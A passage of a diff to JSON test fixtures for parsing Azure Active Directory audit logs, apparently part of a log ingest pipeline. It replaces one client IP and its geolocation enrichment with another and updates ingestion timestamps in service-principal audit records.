",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124846300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -965,25 +875,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -997,7 +889,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -1133,7 +1025,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -1145,12 +1037,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036094700Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124852900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -1176,25 +1068,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1208,7 +1082,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -1344,7 +1218,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -1356,12 +1230,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036101400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_